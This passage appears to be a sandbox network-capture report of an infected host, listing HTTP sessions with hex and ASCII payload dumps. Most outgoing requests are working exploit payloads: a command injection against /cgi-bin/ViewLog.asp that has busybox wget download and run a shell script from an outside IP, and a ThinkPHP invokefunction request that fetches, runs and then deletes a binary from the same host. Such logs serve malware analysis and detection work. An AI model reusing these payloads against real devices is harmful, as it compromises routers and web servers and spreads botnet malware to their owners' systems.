                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:37.869457960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            479192.168.2.235097662.72.45.1638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.511507034 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.846946955 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:58 GMT
                                                            Server: Apache/2.4.57 (Debian)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            480192.168.2.233776831.128.213.728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.514245033 CET117INHTTP/1.1 500 Server Error
                                                            Content-Length: 48
                                                            Date: Wed, 14 Feb 2024 08:28:58 GMT
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            481192.168.2.235312294.253.17.978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:59.103785992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:59.374653101 CET21INHTTP/1.1
                                                            Data Raw:
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            482192.168.2.233969494.120.61.1578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:59.105634928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            483192.168.2.235756094.121.179.648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:59.107584000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            484192.168.2.2334200112.74.44.2880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:00.504760981 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:00.849955082 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            485192.168.2.2343896112.74.58.20280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.191099882 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:01.531372070 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            486192.168.2.2349856112.54.163.17680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.229051113 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:01.609592915 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            487192.168.2.2339996112.48.244.5480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.251220942 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            488192.168.2.2353594112.125.88.5180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.534531116 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:01.896924973 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            489192.168.2.234929694.131.111.2098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.590984106 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.793874025 CET207INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain; charset=utf-8
                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                            Content-Length: 19
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            490192.168.2.235235894.123.131.788080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.644112110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            491192.168.2.233636895.164.242.1008080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.662678003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.783894062 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/3.5.27
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3556
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            X-Cache: MISS from ubuntu
                                                            X-Cache-Lookup: NONE from ubuntu:8080
                                                            Via: 1.1 ubuntu (squid/3.5.27)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            492192.168.2.233511631.136.60.408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.812215090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:02.490658045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:03.834430933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:06.746058941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:12.121387005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:22.871766090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
